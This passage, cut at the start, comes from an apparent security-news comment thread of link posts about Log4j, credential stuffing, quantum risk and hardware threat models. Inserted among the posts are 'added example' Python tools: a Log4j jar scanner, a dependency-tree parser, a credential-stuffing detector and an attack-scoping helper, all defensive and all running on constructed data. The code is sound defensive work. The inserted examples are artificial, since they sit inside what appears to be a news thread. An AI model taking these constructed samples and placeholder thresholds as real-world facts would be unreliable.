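        raw = m.group(1).strip() if m else "unknown"
        ver = parse_version(raw)
        findings.append({
            "path": path,
            "version": raw,
            # unparseable version: report as vulnerable rather than silently pass
            "vulnerable": is_vulnerable(ver) if ver else True,
            "jndi_lookup_present": JNDI_CLASS in names,
        })
    for name in sorted(names):
        if name.lower().endswith(NESTED):
            findings.extend(scan_archive(zf.read(name), f"{path}!{name}"))
    return findings


def scan_directory(root):
    """Walk a deployment directory and scan every jar/war/ear found in it."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(NESTED[:3]):
                full = os.path.join(dirpath, fn)
                with open(full, "rb") as fh:
                    findings.extend(scan_archive(fh.read(), full))
    return findings


def build_sample_tree(root):
    """Constructed test data: a 2.14.1 core jar nested inside app.war, a patched
    2.17.1 jar, and a 2.14.1 jar with JndiLookup.class removed."""
    def core_jar(version, with_jndi=True):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as z:
            z.writestr(POM, f"version={version}\ngroupId=org.apache.logging.log4j\n"
                            f"artifactId=log4j-core\n")
            if with_jndi:
                z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
        return buf.getvalue()

    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as z:
        z.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", core_jar("2.14.1"))
    samples = {
        "app.war": war.getvalue(),
        "log4j-core-2.17.1.jar": core_jar("2.17.1"),
        "log4j-core-2.14.1-stripped.jar": core_jar("2.14.1", with_jndi=False),
    }
    os.makedirs(os.path.join(root, "lib"), exist_ok=True)
    for fn, blob in samples.items():
        with open(os.path.join(root, "lib", fn), "wb") as fh:
            fh.write(blob)


def demo():
    """Build the constructed sample tree in a temp directory and scan it."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    build_sample_tree(root)
    return scan_directory(root)


if __name__ == "__main__":
    for f in demo():
        flag = "VULNERABLE" if f["vulnerable"] else "ok"
        print(f"{flag:10} {f['version']:8} jndi={f['jndi_lookup_present']!s:5} {f['path']}")
```

The version check and the JndiLookup check are reported separately on purpose: a jar with the class deleted no longer exposes the original lookup, but it is still an old version as far as the later fixes (the recursion DoS and the JDBC appender issue) are concerned, so it stays flagged until it is actually upgraded.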
Tomi Engdahl says:
Quantum Computing Is for Tomorrow, But Quantum-Related Risk Is Here Today
https://www.securityweek.com/quantum-computing-tomorrow-quantum-related-risk-here-today
Booz Allen Hamilton has analyzed the quantum computing arms race to determine China’s current and future capabilities, and to understand the likely use of China’s cyber capabilities within that race. It concludes, “Risk management must start now.”
The report is really in two halves. The first describes the cybersecurity threat inherent in the quantum arms race, while the second is a primer on the complexities of quantum computing. While this is worth reading, only the cybersecurity threats are relevant to us here.
The two cybersecurity threats
Theft of quantum-relevant research
Quantum decryption
The state of quantum and the threats today
There is, however, little that is new in the Booz Allen analysis – except, perhaps, a suggestion that the threat is not as pressing as some people argue. The report states, “Many of quantum computing’s improvements over classical computers… are unlikely to be demonstrated for at least a decade.” This is a big unknown – nobody knows how long it will be before limited use quantum computing becomes a reality.
Booz Allen recommendations
The report makes only three primary recommendations to counter the quantum-related threats from China. The first is to use threat modeling to assess changes to organizational risks based on a better understanding of what China wants and why it wants it.
“Organizations are constantly challenged to stay ahead of attackers. While the application of quantum computing may be several years away, if and when it does become a part of the threat landscape it will put additional pressure on cybersecurity teams to minimize risks that can be exploited,” says Yaniv Bar-Dayan, CEO & co-founder at Vulcan Cyber. “Booz Allen appropriately recommends that organizations use threat modeling to assess how their risk will change and develop associated strategies for mitigating that risk.”
The second recommendation is to develop an organizational strategy for deploying post-quantum (that is, quantum proof) encryption. This really should be done as soon as possible. Chinese threat actors are not waiting for the ability to decrypt data, they are stealing it now for decryption later.
“The computational ability of quantum computers poses a high risk to public-key algorithms, and it may allow nation-state threat actors to break asymmetric cryptography efficiently,” comments Ivan Righi, cyber threat intelligence analyst at Digital Shadows. “This may enable nation-state actors to eavesdrop on communications, intercept private keys, and steal data.”
The third is more general purpose – educate staff and keep informed about the state of quantum development and the risks that come from it. “The arms race to quantum computing ushers in a new era of competitive advantage and cyber risk,” says Rajiv Pimplaskar, CRO at Veridium. “CISOs, IT and business leaders should be acutely mindful of this risk.”
Tomi Engdahl says:
IoT’s Importance is Growing Rapidly, But Its Security Is Still Weak
https://www.securityweek.com/iots-importance-growing-rapidly-its-security-still-weak
The explosive growth of IoT devices opens an extensive attack surface that needs to be addressed
The weakest link in most digital networks is the person sitting in front of the screen – the defining feature of the Internet of People (IoP). Because that’s where, through cunning and manipulative tactics, unsuspecting recipients can be tricked into opening toxic links. Little do they know, however, they’ve unwittingly opened the gates to digital catastrophe.
Tomi Engdahl says:
How combining human expertise and AI can stop cyberattacks
https://lm.facebook.com/l.php?u=https%3A%2F%2Fventurebeat.com%2F2022%2F01%2F03%2Fhow-combining-human-expertise-and-ai-stop-cyberattacks%2F&h=AT3Ua_hdPsqCjUuSiRx15X9ynhUSbiEgjgW3jmacH84Ex6FpmvTNCZyrsyM0xYL6e1089deOFdv5AebOfkdMTK5QGn41p-kbFNhdFxN2x5zgFeE5Q6ODw9iuuQPAyquPybpXuZZSm8z4hGWOsQ
Chief information security officers’ (CISOs) greatest challenge going into 2022 is countering the speed and severity of cyberattacks. The latest real-time monitoring and detection technologies improve the odds of thwarting an attack but aren’t foolproof. CISOs tell VentureBeat that bad actors avoid detection with first-line monitoring systems by modifying attacks on the fly. That’s cause for concern, especially with CISOs in financial services and health care.
Even the most advanced AI and machine learning-based threat monitoring and response systems need time to interpret, learn, and defend against new attack patterns. Structured machine learning algorithms that rely on convolutional neural networks help reduce the latencies. However, bad actors are improvising attack techniques faster than AI and ML techniques can react.
Tomi Engdahl says:
Gartner Predicts By 2025 Cyber Attackers Will Have Weaponized Operational Technology Environments to Successfully Harm or Kill Humans
Organizations Can Reduce Risk by Implementing a Security Control Framework
https://www.gartner.com/en/newsroom/press-releases/2021-07-21-gartner-predicts-by-2025-cyber-attackers-will-have-we
Tomi Engdahl says:
Autonomous “Slaughterbots” Could Soon Be Used By Drug Cartels, Warns MIT Professor
https://www.iflscience.com/technology/autonomous-slaughterbots-could-soon-be-used-by-drug-cartels-warns-mit-professor/
In a recent interview with The Next Web, MIT Professor and founder of the Future of Life Institute Max Tegmark has made some dire predictions about the future uses of militarized robots, and the ideas paint a grim picture of future warfare. Talking about small, weaponized, autonomous drones and robots, Tegmark suggests that once “slaughterbots” are fully developed by the military, it is only a matter of time before civilians can get their hands on them, as they do with so many other weapons. In the wrong hands – such as drug cartels – these bots will open a gateway of cheap and almost unstoppable targeted assassinations onto whoever they choose, he said, adding that governments need to step in now before that dystopian scenario becomes reality.
“If you can buy slaughterbots for the same price as an AK-47, that’s much preferable for drug cartels, because you’re not going to get caught anymore when you kill someone,”
‘Slaughterbots’ are a step away from your neighborhood — and we need a ban
Lethal autonomous weapons are becoming a reality
https://thenextweb.com/news/slaughterbots-are-a-step-away-from-your-neighborhood-and-we-need-a-ban
Tomi Engdahl says:
Connecting the dots on diversity in cybersecurity recruitment
https://techcrunch.com/2022/01/03/connecting-the-dots-on-diversity-in-cybersecurity-recruitment/?tpcc=tcplusfacebook
Mandy Andress
@elastic / 1:22 AM GMT+2•January 4, 2022
Mandy Andress is the chief information security officer at Elastic, an enterprise search company, and has more than 25 years of experience in information risk management and security.
Critical thinking and problem-solving are considered vital attributes for the cybersecurity professional — so it’s time our industry applied those capabilities to connect the dots between the skills shortage and lack of diversity.
There’s no question that recruiting talent in sufficient numbers right now is a growing challenge — but it’s one that I believe a more inclusive talent pipeline would help to alleviate.
In its Cybersecurity Workforce Study 2021, industry body (ISC)2 found that 2.7 million information security jobs remain unfilled worldwide. While this number is down from 3.1 million in 2020, we’re a long way from where we need to be. In the face of increased digitization and a rising tide of attacks, the current cybersecurity workforce of 4.2 million people globally needs to grow 65% to keep up with the demand for its skills.
Tomi Engdahl says:
Predictions: SecurityWeek’s 2022 Cybersecurity Outlook
https://www.securityweek.com/predictions-securityweeks-2022-cybersecurity-outlook
Members of the SecurityWeek editorial team look into their crystal balls and make some bold predictions about the big cybersecurity stories that will dominate the headlines in 2022. Our predictions cover the range of issues plaguing cybersecurity, including ransomware extortion attacks, software supply chain weaknesses, ICS security, geopolitics, IoT and privacy.
Editor-at-Large Ryan Naraine on nation-state APTs, software supply chain security and the hackers-for-hire industry:
Ransomware slows – Major ransomware outbreaks will slowly subside as companies beef up defenses and counter-operations by global law enforcement disrupt and (partially) disable the high-profile gangs. In 2022, security leaders will continue to prioritize the basics (properly tested backups, patching, multi-factor authentication and secure cloud deployments) to reduce exposure to ransomware extortion, making it more of a nuisance than a national security threat.
Supply chain mega-hacks – Even as ransomware attacks subside, the extent of the software supply chain weaknesses will come into sharper focus. Expect a few more SolarWinds-type supply chain mega-hacks to dominate the headlines
The hacker-for-hire industry – A big story this year will be the continued outing of PSOAs (private sector offensive actors) supplying exploits and hacking tools to governments around the world.
Iran and North Korea financial malware – Government-backed hackers linked to North Korea and Iran will aggressively target poorly protected organizations with malware capable of siphoning billions of dollars from crypto-banks and financial institutions.
China’s zero-day factory – The scale of China’s offensive cyber capabilities will be front and center in 2022 as new zero-day disclosure rules take effect and Chinese hackers continue to show off technical brilliance at exploiting the most modern software products.
Malware below the OS – We will soon start to see a steady flow of malware discoveries below the operating system, specifically rootkits and bootkits targeting flaws in UEFI firmware.
The great resignation in cyber – Weary and overworked from all the major cybersecurity crises, skilled practitioners will continue to resign en-masse, leaving security programs struggling to fill important positions. The lingering exhaustion from the SolarWinds/Kaseya/Log4j incidents, combined with pandemic-induced anxieties, will cause the ‘great resignation’ to hit harder as director-level staff join the exodus. By the end of 2022, the cybersecurity skills shortage will reach critical levels with no real relief in sight.
Eduard Kovacs on industry trends and OT/ICS security:
VC funding frenzy – 2022 will be another record-breaking year in terms of venture capital funding for startups solving cybersecurity problems.
M&A activity – The volume of mergers and acquisitions will remain steady – roughly 400 cybersecurity-related deals will be announced in 2022.
Targeting the power sector – Electric utilities will continue to be targeted by ransomware and some will suffer significant disruptions, mostly on the IT side.
OT breaches – Some manufacturers will publicly admit that production has been disrupted due to a breach in the OT network, which is increasingly connected to the IT network and even the internet.
Industrial control system vulnerabilities – The number of ICS vulnerabilities discovered by vendors and researchers will continue to increase and it will exceed 1,000 in 2022.
Kevin Townsend on geopolitics, privacy, tokenization:
Geopolitics – There is already a global cyberwar.
Mobile Internet of Things – IoT devices are increasingly used in vehicles: cars, transporters, aircraft, drones and satellites. These vehicles will become attractive targets. Compromise could be catastrophic. Extortion could be the motivation.
Privacy – Governments legislate for privacy to please the voters.
Tokenization – The cloud has changed the economics of ‘encryption’. Tokenization is no longer too expensive to consider. Technically, tokenization offers many advantages over traditional encryption.
Quantum – Some form of quantum computing could, but almost certainly will not, appear in 2022. However, the future threat of quantum decryption is here now. Vendors will announce more methods of quantum-proofing encryption, while nation states will increase the theft of national and trade secrets and PII, pending future decryption.
Adversarial AI – The use of artificial intelligence by criminal groups will increase. It will be used in advanced BEC attacks, and in confusing AI and machine learning defenses.
Ionut Arghire on cybercrime and IoT security:
Ransomware will continue to be a menace to both private and public sectors, critical infrastructure included.
Russia- and China-backed APT groups will be less visible, mainly due to an increase in sophistication.
IoT and software supply chain vulnerabilities will remain a steady occurrence in headlines, but, following 2021’s major attacks, security researchers will focus on the latter. That will result in more high-impact supply chain flaws being discovered.
Counter-operations – Security companies and law enforcement will increase their efforts to identify and dismantle cybercrime rings, but disruptions will most likely be temporary/partial.
Tomi Engdahl says:
Germany: New government plans ‘right to encryption’.
The coalition contract of the newly elected German government contains right to encryption.
https://tutanota.com/blog/posts/germany-right-to-encryption/
Tomi Engdahl says:
Log4j flaw hunt shows how complicated the software supply chain really is
https://www.zdnet.com/article/log4j-flaw-hunt-shows-how-complicated-the-software-supply-chain-really-is/
Open source software is everywhere now, but the Log4j flaw that affects Java enterprise applications is a reminder of what can go wrong in the complicated modern software supply chain. The challenge with the Log4j flaw (also known as Log4Shell) is not only that admins need to patch the flaw — which got a ‘critical’ rating of 10 out of 10 — but that IT folk can’t easily discover whether a product or system is affected by the vulnerability in the component. Google has calculated that approximately 17,000 Java packages in the Maven Central repository – the most significant Java package repository – were found to contain the vulnerable log4j-core library as a direct or transitive dependency. It found that overall, direct inclusion of Log4j code in artefacts is not as common as the use of Log4j through dependencies. However, it still adds up to hundreds of packages – around 400 – which directly include Log4j code, opening these packages to Log4j vulnerabilities.
Apache Log4j: Mitigation for DevOps
https://www.trendmicro.com/en_us/devops/22/a/apache-log4j-mitigation-for-devops.html
What can DevOps teams do to mitigate Apache Log4j risks? Explore how to secure your apps for today and against future vulnerabilities.
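An added example, not code from the ZDNet or Trend Micro articles and not a tool either publishes: a small Python parser for the text `mvn dependency:tree` prints, which tells direct inclusion of log4j-core apart from transitive inclusion, the distinction the Google count above rests on. The dependency tree is constructed for this example (every coordinate other than log4j-core is made up), and `FIXED_VERSION` is an assumed threshold to be set from your own advisory tracking, not a statement about any particular release.

```python
"""Classify Log4j exposure in a Maven dependency tree (added example, constructed input)."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample in the shape `mvn dependency:tree` prints:
# group:artifact:type:version[:scope], with the tree-drawing prefix.
SAMPLE_TREE = """\
com.example:shop-api:jar:1.4.0
+- org.apache.logging.log4j:log4j-core:jar:2.14.1:compile
+- com.example:shop-common:jar:1.4.0:compile
|  \\- org.apache.logging.log4j:log4j-core:jar:2.13.3:compile
+- org.apache.logging.log4j:log4j-api:jar:2.17.1:compile
\\- com.example:reporting:jar:2.0.0:compile
   \\- org.apache.logging.log4j:log4j-core:jar:2.17.1:compile
"""

LOG4J_CORE = ("org.apache.logging.log4j", "log4j-core")
# Assumption: versions below this threshold are reported as affected.
# Set it from your own advisory tracking; it is a parameter, not a fact about a release.
FIXED_VERSION = (2, 17, 1)

# Tree prefix is drawn with '+', '-', '|', '\' and spaces, three characters per level.
COORD_RE = re.compile(
    r"^(?P<prefix>[+|\\ -]*)"
    r"(?P<group>[^:\s]+):(?P<artifact>[^:\s]+):(?P<type>[^:\s]+):(?P<version>[^:\s]+)"
    r"(?::(?P<scope>\S+))?$"
)


@dataclass
class Finding:
    version: str
    depth: int
    direct: bool          # pulled in by the project itself (depth 1)
    affected: bool        # version below FIXED_VERSION
    via: Optional[str]    # the direct dependency that pulled it in, if transitive


def parse_version(v: str) -> Tuple[int, int, int]:
    """Reduce a version string to a comparable (major, minor, patch) tuple."""
    nums = [int(p) for p in re.findall(r"\d+", v)[:3]]
    while len(nums) < 3:
        nums.append(0)
    return (nums[0], nums[1], nums[2])


def find_log4j_core(tree_text: str) -> List[Finding]:
    """Walk the tree, tracking the path of coordinates from the root to each line."""
    findings: List[Finding] = []
    path: List[str] = []  # path[d] = "group:artifact" currently open at depth d
    for line in tree_text.splitlines():
        m = COORD_RE.match(line)
        if not m:
            continue
        depth = len(m.group("prefix")) // 3
        coord = f"{m.group('group')}:{m.group('artifact')}"
        del path[depth:]          # close deeper branches
        path.append(coord)
        if (m.group("group"), m.group("artifact")) != LOG4J_CORE:
            continue
        version = m.group("version")
        findings.append(Finding(
            version=version,
            depth=depth,
            direct=(depth == 1),
            affected=parse_version(version) < FIXED_VERSION,
            via=None if depth <= 1 else path[1],
        ))
    return findings


def summarize(findings: List[Finding]) -> dict:
    """Counts in the three buckets an inventory team cares about."""
    return {
        "direct_affected": sum(1 for f in findings if f.direct and f.affected),
        "transitive_affected": sum(1 for f in findings if not f.direct and f.affected),
        "not_affected": sum(1 for f in findings if not f.affected),
    }


if __name__ == "__main__":
    for f in find_log4j_core(SAMPLE_TREE):
        print(f)
    print(summarize(find_log4j_core(SAMPLE_TREE)))
```

The transitive case is the one the article is about: `shop-common` drags in an old log4j-core that the project's own `pom.xml` never mentions, so a grep of the build file would miss it. Feed the function the real tree output of each build to get the same three buckets for your own inventory.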
Tomi Engdahl says:
Intercepting 2FA: Over 1200 man-in-the-middle phishing toolkits detected https://blog.malwarebytes.com/reports/2022/01/intercepting-2fa-over-1200-man-in-the-middle-phishing-toolkits-detected/
Two-factor authentication (2FA) has been around for a while now and
Tomi Engdahl says:
Senators Ask DHS, DOT About Transportation Infrastructure Cybersecurity
https://www.securityweek.com/senators-ask-dhs-dot-about-transportation-infrastructure-cybersecurity
Several U.S. senators have sent a letter to the Department of Homeland Security (DHS) and the Department of Transportation (DOT), requesting information about the cybersecurity of the nation’s transportation infrastructure.
The letter was signed by 10 republican and democrat senators led by Jacky Rosen (D-NV) and Roger Wicker (R-MS).
The lawmakers want information on the two departments’ capabilities when it comes to detecting, preventing and responding to cyberattacks. Specifically they are seeking information on how the DHS and DOT are meeting their six responsibilities, as described in the William M. (Mac) Thornberry National Defense Authorization Act for Fiscal Year 2021.
Tomi Engdahl says:
NY AG: Credential Stuffing Impacts 1.1 Million Users at 17 Companies
https://www.securityweek.com/ny-ag-credential-stuffing-impacts-11-million-users-17-companies
Following months of monitoring online communities dedicated to credentials stuffing, a list of 1.1 million impacted customer accounts at 17 well-known companies was compiled, including accounts at food delivery services, online retailers, and restaurant chains.
According to a “Business Guide for Credential Stuffing Attacks” that the New York Attorney General has just released, there are over 15 billion credentials currently circulating on the web. Adversaries are abusing these to launch hundreds of billions of credential stuffing attacks each year.
https://ag.ny.gov/sites/default/files/businessguide-credentialstuffingattacks.pdf
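An added example, not from the SecurityWeek article or the Attorney General's guide: detection logic for the pattern that distinguishes credential stuffing from a plain brute-force attempt, namely one source trying many different usernames in a short window. The log lines are constructed for this example (addresses from documentation ranges, made-up usernames), and the line format, window and threshold are assumptions to adapt to your own authentication logs.

```python
"""Flag sources that try many distinct accounts in a short window (added example, constructed log)."""
import re
from collections import Counter, defaultdict
from datetime import datetime, timezone
from typing import Dict, List

# Constructed sample log. 203.0.113.7 walks a list of accounts (stuffing);
# 198.51.100.20 hammers one account (brute force, deliberately not matched here).
SAMPLE_LOG = """\
2022-01-05T10:00:01Z ip=203.0.113.7 user=alice result=FAIL
2022-01-05T10:00:02Z ip=203.0.113.7 user=bob result=FAIL
2022-01-05T10:00:02Z ip=203.0.113.7 user=carol result=FAIL
2022-01-05T10:00:03Z ip=203.0.113.7 user=dave result=OK
2022-01-05T10:00:04Z ip=203.0.113.7 user=erin result=FAIL
2022-01-05T10:00:05Z ip=203.0.113.7 user=frank result=FAIL
2022-01-05T10:00:09Z ip=198.51.100.20 user=alice result=FAIL
2022-01-05T10:00:40Z ip=198.51.100.20 user=alice result=FAIL
2022-01-05T10:01:10Z ip=198.51.100.20 user=alice result=OK
2022-01-05T10:02:00Z ip=192.0.2.5 user=gina result=FAIL
"""

LINE_RE = re.compile(r"^(\S+) ip=(\S+) user=(\S+) result=(OK|FAIL)$")


def parse_events(log_text: str) -> List[dict]:
    """Turn log lines into events with an epoch timestamp; unparseable lines are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        events.append({"ts": ts.timestamp(), "ip": m.group(2),
                       "user": m.group(3), "ok": m.group(4) == "OK"})
    return events


def detect_credential_stuffing(events: List[dict], window_s: int = 60,
                               min_distinct_users: int = 5) -> Dict[str, dict]:
    """Sliding window per source: alert when distinct usernames in any window reach the threshold.

    Returns, per flagged source, the peak number of distinct accounts, the failures in the
    last window that tripped the rule, and the accounts where a login succeeded inside it
    (the ones to treat as compromised, as the guide's "impacted accounts" were).
    """
    by_ip: Dict[str, List[dict]] = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)

    alerts: Dict[str, dict] = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        users: Counter = Counter()   # username -> attempts currently inside the window
        left = 0
        for right, e in enumerate(evs):
            users[e["user"]] += 1
            # Drop events that fell out of the window.
            while evs[right]["ts"] - evs[left]["ts"] > window_s:
                old = evs[left]["user"]
                users[old] -= 1
                if users[old] == 0:
                    del users[old]
                left += 1
            if len(users) >= min_distinct_users:
                window = evs[left:right + 1]
                alert = alerts.setdefault(ip, {"distinct_users": 0, "failures": 0, "compromised": set()})
                alert["distinct_users"] = max(alert["distinct_users"], len(users))
                alert["failures"] = sum(1 for w in window if not w["ok"])
                alert["compromised"] = {w["user"] for w in window if w["ok"]}
    return alerts


if __name__ == "__main__":
    for ip, alert in detect_credential_stuffing(parse_events(SAMPLE_LOG)).items():
        print(ip, alert)
```

The rule keys on account breadth rather than failure count, because stuffing runs are expected to fail on most accounts and succeed on a few; a per-account lockout does nothing against them. Real campaigns spread load across many addresses, so in production the same window logic is usually also run keyed on ASN or on a device fingerprint rather than on a single IP.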
Tomi Engdahl says:
Making PUFs Even More Secure
https://semiengineering.com/making-pufs-even-more-secure/?cmid=88131501-5ef0-4b55-a87d-70e86c1d8d0a
New sources of entropy could significantly improve robustness of physically unclonable functions.
As security has become a must-have in most systems, hardware roots of trust (HRoTs) have started appearing in many chips. Critical to an HRoT is the ability to authenticate and to create keys – ideally from a reliable source that is unviewable and immutable.
“We see hardware roots of trust deployed in two use models — providing a foundation to securely start a system, and enabling a secure enclave for the end user of the SoC,” said Jason Oberg, co-founder and CTO at Tortuga Logic. “Use cases include storing biometric data, customer-programmed encryption/authentication keys, and unique IDs.”
Those keys and IDs are where physically unclonable functions (PUFs) excel. But today, there’s only one PUF technology broadly deployed. New ones are being readied for commercial use, and they leverage new sources of entropy. Even more are in the research stage.
Tomi Engdahl says:
Security Starts With A Threat Assessment
https://semiengineering.com/security-starts-with-a-threat-assessment/?cmid=88131501-5ef0-4b55-a87d-70e86c1d8d0a
The different types of attacks a device might face.
Developing the security architecture for an electronic device begins with building a threat model wherein we ask these questions:
What is the operational environment in which the device needs to function?
What type of attacks can be identified?
What level of access does a potential attacker have to the device?
What possible attack paths can an attacker exploit?
What resources (money, time), expertise and specialized equipment would a potential attacker be willing to expend given the value of assets at risk?
What would be the damage incurred if an attacker successfully obtained control over a device or its data?
Based on the threat assessment, security architects can define the right level of security for their device and how it is to be implemented and maintained. In this blog, let’s take that second question and consider the kinds of attacks that we could expect.
First, let’s consider remote attacks. These are attacks that do not require ‘physical proximity’ of the attacker and the device being attacked. Attacks through a network interface that target rogue software execution on the device processor (e.g., buffer overflow attacks) could enable an attacker to:
Exploit by execution of non-trusted or 3rd-party code
Steal data being sent to or from a device
Attempt to corrupt or replay data in transit
Remote attacks tend to be cheap to perform and scale very well, allowing attacks on other identical devices.
If an attacker can gain physical access to the device, this opens new avenues for exploitation. These “local access” attacks are often categorized into three rough groups, with increasing attack complexity and cost:
Board-level attacks. These attacks can be mounted using simple tools like a screwdriver, a soldering iron, or a JTAG-based debugging tool, replacing components or connecting to the board or chip debug infrastructure. Examples: Flash chip replacement; debug interface access; scan chain/test logic access; inter-chip bus monitoring.
Chip-level non-invasive attacks. This type of attack targets the chip itself while it is in operation without damaging the chip. Attacks of this type typically require the chip to be connected to an oscilloscope and/or dedicated hardware for measuring, capturing, and analyzing electrical behavior of the chip. Side channel attacks such as differential power analysis are well known non-invasive attacks that can successfully reveal used key materials in unprotected implementations.
Chip-level invasive attacks. This class of attacks actually “open up” the chip by removing its packaging, exposing the die to allow direct access to the wiring and memory structures within the chip. To perform an attack like this requires the use of specialized or bespoke equipment that is expensive and complex to operate. Such equipment can sometimes be rented from universities or companies specialized in reverse engineering of chips, but nevertheless, will require a larger investment from the attacker to get to the information sought.
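An added example, not from the Semiconductor Engineering post: the attack classes above, from remote to chip-level invasive, turned into a small Python scoping helper that answers the blog's third, fifth and sixth questions together (what access the attacker has, what they would spend, and what is at stake). The cost figures, attacker profiles and asset values are constructed for illustration; the only thing taken from the post is the ordering of the four classes by access and cost, and the observation that remote attacks scale across identical devices.

```python
"""Scope attack classes against an attacker profile (added example; all numbers constructed)."""
from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class AttackClass:
    name: str
    access: str        # "remote", "board", "chip_noninvasive" or "chip_invasive"
    cost_usd: int      # constructed order-of-magnitude cost to mount the attack once
    scales: bool       # one effort transfers to every identical device (true for remote attacks)


@dataclass(frozen=True)
class AttackerProfile:
    name: str
    budget_usd: int
    physical_access: str   # "none", "board" or "chip"


# The four groups from the post, with placeholder costs in increasing order.
ATTACK_CLASSES = [
    AttackClass("network exploit against device software", "remote", 1_000, True),
    AttackClass("board-level: debug port, flash swap, bus sniffing", "board", 5_000, False),
    AttackClass("chip-level non-invasive: power analysis", "chip_noninvasive", 50_000, False),
    AttackClass("chip-level invasive: decapsulation and probing", "chip_invasive", 500_000, False),
]

# How much physical access each attack needs versus how much the attacker has.
REQUIRED_RANK = {"remote": 0, "board": 1, "chip_noninvasive": 2, "chip_invasive": 2}
ATTACKER_RANK = {"none": 0, "board": 1, "chip": 2}


def in_scope(attacker: AttackerProfile, asset_value_usd: int, fleet_size: int) -> List[AttackClass]:
    """Attacks the attacker can reach, can afford, and would find worth the cost.

    A scaling attack pays off across the whole fleet; a per-device attack only once.
    """
    result = []
    for a in ATTACK_CLASSES:
        reachable = ATTACKER_RANK[attacker.physical_access] >= REQUIRED_RANK[a.access]
        affordable = a.cost_usd <= attacker.budget_usd
        payoff = asset_value_usd * (fleet_size if a.scales else 1)
        worthwhile = a.cost_usd <= payoff
        if reachable and affordable and worthwhile:
            result.append(a)
    return sorted(result, key=lambda a: a.cost_usd)


def required_hardware_tier(attacks: List[AttackClass]) -> int:
    """Highest access rank among in-scope attacks: 0 = software hardening only,
    1 = also lock debug/test interfaces, 2 = also side-channel/tamper countermeasures."""
    return max((REQUIRED_RANK[a.access] for a in attacks), default=0)


if __name__ == "__main__":
    botnet = AttackerProfile("opportunistic botnet operator", 2_000, "none")
    lab = AttackerProfile("well-funded lab", 1_000_000, "chip")
    for attacker, value, fleet in [(botnet, 100, 100_000), (lab, 50_000, 1)]:
        scoped = in_scope(attacker, value, fleet)
        print(attacker.name, "->", [a.name for a in scoped], "tier", required_hardware_tier(scoped))
```

The point the numbers make is the one the post makes in words: a cheap device sold in large numbers is mostly exposed to the remote class, so software hardening and secure update dominate the budget, while a single high-value unit in an attacker's hands has to assume board-level and side-channel attacks as well.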
Tomi Engdahl says:
The Second Building Block for the SOC of the Future: An Open Integration Framework
https://www.securityweek.com/second-building-block-soc-future-open-integration-framework
The SOC of the future must be data driven, so it’s essential that systems and tools can work together
As we turn the page on another year and read the columns on “what’s in/what’s out”, one of the trends in cybersecurity that is definitely “in” is Security Operations Center (SOC) modernization. Evidence continues to mount that it isn’t a matter of if, but when and how an organization will be attacked. With that, we see SOCs narrowing the focus of their mission to become detection and response organizations, and they need certain building blocks in place to prepare their SOC for the future.
https://www.securityweek.com/acronyms-aside-soc-future-needs-these-3-capabilities
Tomi Engdahl says:
Defense Contractors Must do More to Conceal Their Attack Surface
https://www.securityweek.com/defense-contractors-must-do-more-conceal-their-attack-surface
The world is entering a new era dominated by the rise of peer competitors like China and Russia, who are increasingly exerting their geo-political influence. After two decades of fighting a counter terrorist focused war where the tools of the US and its allies were far superior, the competitive landscape is changing significantly.
The rise of quantum computing, hypersonic weapons and criminal groups acting on behalf of nation states have changed the calculus and the stakes of twenty-first century warfare. The US and its allies are having to prepare for potential conflicts in Eastern Europe and/or the South China Sea. Both adversaries in such a conflict already possess significant knowledge of US cyber infrastructure and have a consistent history of exploiting these weaknesses.
Meanwhile, the US defense contractor community is charged with building hardware and software that will provide clear strategic and tactical advantages on the battlefield. However, the continuing rise of social engineering tactics as well as risks associated with embedded vulnerabilities in contractor networks makes keeping this technology confidential and out of the hands of adversaries increasingly difficult.
In fact, threat actors have already demonstrated the ability to infiltrate government networks through supply chain attacks such as Solarwinds that compromised at least nine Federal agencies. The close working relationship between defense contractors and the US government poses a significant risk for data leakage in the event of a data breach. In November of last year, a phishing attack against Electronic Warfare Associates confirmed that defense contractors are actively being targeted by adversaries.
Tomi Engdahl says:
The great security delusion: We know what works
https://brand-studio.fortune.com/cisco/the-great-security-delusion-we-know-what-works/?prx_t=CjcHAAAAAAoPEQA&fbclid=IwAR1f8d0XfhMo9koLnV3Ol7LSJajCB37GKFq33sCPu1F9cJKXxcgFZF5mIyo
Why organizations need to adopt evidence-driven security programs and tactics, according to Cisco’s head of advisory CISOs Wendy Nather.
Despite a reality in which we are seeing more frequent and actively dangerous cybersecurity attacks against critical infrastructure, hospitals, enterprises, and our democracy as a whole, security as an industry has been relying on conventional wisdom and hearsay versus practices that show proof of providing strong security outcomes. We can no longer afford to throw all kinds of security spaghetti at the wall to see what sticks. As malicious actors evolve their tactics and the severity of ransomware and data theft increases, so too should our response evolve, from one of hoping what we’ve always done will work to one of evidence-driven security programs and tactics.
More than anything, the report and today’s threats illustrate that we’re all part of the same security ecosystem. This not only includes the business and security practices within one organization—but the intrinsically connected security posture of one organization to another. More than ever, we have shared risk and responsibility. What affects us, affects our neighbors. This means one organization can’t sigh in relief when their neighbor is breached—the probability is that it’s only a matter of time till they are also impacted, as we have seen in many recent supply-chain linked attacks.
At its core, security is a business-level problem, not something relegated to the security team alone. Board members and the C-suite are thinking about security all the time, maybe more than ever—or should be—given the dominance of headlines around the latest attacks. However, if security professionals can’t justify their program strategy beyond best practices, how can they explain it to a board they now report to that relies completely on the security team’s technical expertise?
This is one of the reasons we must seek to connect security process and practices with specific outcomes. This is the most reliable way to maintain an organization and their ecosystems securely.
We need to stop relying on undocumented, unproven “best practices”—or the way we’ve always done things—because they often stem from ignorance that can cause more harm than good. In an era where business costs are under scrutiny, we need to justify expenses with better arguments than “everyone is doing it,” or “it’s new, so we should add it to our arsenal.”
